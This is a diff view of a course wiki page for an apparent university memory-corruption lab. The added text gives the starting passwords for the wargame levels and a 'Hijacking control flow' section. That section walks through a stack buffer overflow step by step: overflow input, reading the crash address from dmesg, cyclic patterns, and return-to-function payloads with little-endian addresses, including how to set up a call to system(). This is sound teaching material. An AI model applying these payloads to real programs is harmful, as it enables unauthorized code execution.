Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revision Previous revision
Next revision
Previous revision
sesiuni:memory:4 [2013/07/11 04:36]
rcaragea [Gdb tricks you might need]
sesiuni:memory:4 [2013/07/12 15:21] (current)
rcaragea [Hijacking control flow]
Line 19: Line 19:
   * Your goal is to '​trick'​ the application into reading the content of that file   * Your goal is to '​trick'​ the application into reading the content of that file
   * After you obtain the password you can advance to the next level by switching to that user   * After you obtain the password you can advance to the next level by switching to that user
-  * You are initially given the password to log into randmin_01 and gatekeeper_01+  * You are initially given the password to log into randmin_01: "​1234" ​and gatekeeper_01: "​4321"​
  
 == Categories == == Categories ==
Line 26: Line 26:
   * **gatekeeper_01**   * **gatekeeper_01**
   * **gatekeeper_02**   * **gatekeeper_02**
-  * **gatekeeper_03**+  * **gatekeeper_03** ​(Bonus)
  
 Category 2 (memory corruption) Category 2 (memory corruption)
Line 86: Line 86:
  
 **NOTE**: The segmentation fault is expected as that address is not mapped into the process address space. **NOTE**: The segmentation fault is expected as that address is not mapped into the process address space.
 +
 +
 == Gdb tricks you might need == == Gdb tricks you might need ==
-Check the [[sesiuni:​memory:​gdb|]]+Check the [[sesiuni:​memory:​gdb|]] ​especially in the '​information'​ and '​various useful stuff' sections 
 + 
 + 
 +== Hijacking control flow == 
 + * The exact location of a segfault is written in the kernel log. You can view it with dmesg (you'​ll only need the last line) 
 + 
 +<code bash> 
 +randmin_01@102lin:​~$ ./​randmin_01 
 +Enter the password: 
 +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
 +You entered: 
 +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
 +You are not the Randministrator! 
 +This unauthorized attempt will be logged. 
 +Segmentation fault 
 +randmin_01@102lin:​~$ dmesg|tail -1 
 +[ 5277.100200] randmin_01[5839]:​ segfault at 41414141 ip 0000000041414141 sp 00000000ffffd370 error 14 
 +randmin_01@102lin:​~$  
 +</​code>​ 
 + 
 +* You can use a pattern so that you can easily see what was written into the return address instead of trial and error. 
 +<code bash> 
 +randmin_01@102lin:​~$ ./​randmin_01 
 +Enter the password: 
 +Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5 
 +You entered: 
 +Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5 
 +You are not the Randministrator! 
 +This unauthorized attempt will be logged. 
 +Segmentation fault 
 +randmin_01@102lin:​~$ dmesg|tail -1 
 +[ 5481.155852] randmin_01[5853]:​ segfault at 64413764 ip 0000000064413764 sp 00000000ffffd370 error 14 
 +</​code>​ 
 + 
 + 
 + * When you want to jump to a function that takes no arguments you only need to append its address to the exploit pattern 
 +      <code c> 
 +      ... 
 +      int f() 
 +      { 
 +          printf("​Hello\n"​);​ 
 +          return 42; 
 +      } 
 +      ... 
 +      </​code>​ 
 + * If the address of the function is 0x0804849c your exploit pattern will look like "​AAAAAA...AAA\x9c\x84\x04\x08"​ because calling this function will look like 
 +      <code asm> 
 +      ... 
 +      call   ​804849c <f> 
 +      ... 
 +      </​code>​ 
 +* For tasks randmin_03 and up you will need to call system(char *cmd) 
 +      <code c> 
 +      ... 
 +      int f(char *str) 
 +      { 
 +          printf("​%s\n",​ str); 
 +          return 42; 
 +      } 
 +      ... 
 +      </​code>​ 
 +*  Translated to asm: 
 +      <code asm> 
 +      ... 
 +      movl   ​$0x80485a0,​(%esp) ​     (0x80485a0 is the address of the string parameter) 
 +      call   ​804849c <​f> ​            
 +      ... 
 +      </​code>​ 
 +* Because '​call'​ also pushes 4 bytes on the stack the parameter is offset by exactly 4 bytes, so if you want to call f with the address of that string your exploit should look like "​AAAAAA...AAA\x9c\x84\x04\x08ABCD\xa0\x85\x04\x08"​ where ABCD is the 4 byte value mentioned (any value will work) 
 + 
 +== Tools you will need == 
 +  * gdb 
 +  * nm 
 +  * ldd 
 +  * objdump 
 +  * ulimit 
 +  * checksec.sh [[http://​www.trapkit.de/​tools/​checksec.sh]] 
 +  * <del> aslr_brute_helper.py [[http://​swarm.cs.pub.ro/​~rcaragea/​aslr_brute_helper.py]] </​del>​
sesiuni/memory/4.1373506596.txt.gz · Last modified: 2013/07/11 04:36 by rcaragea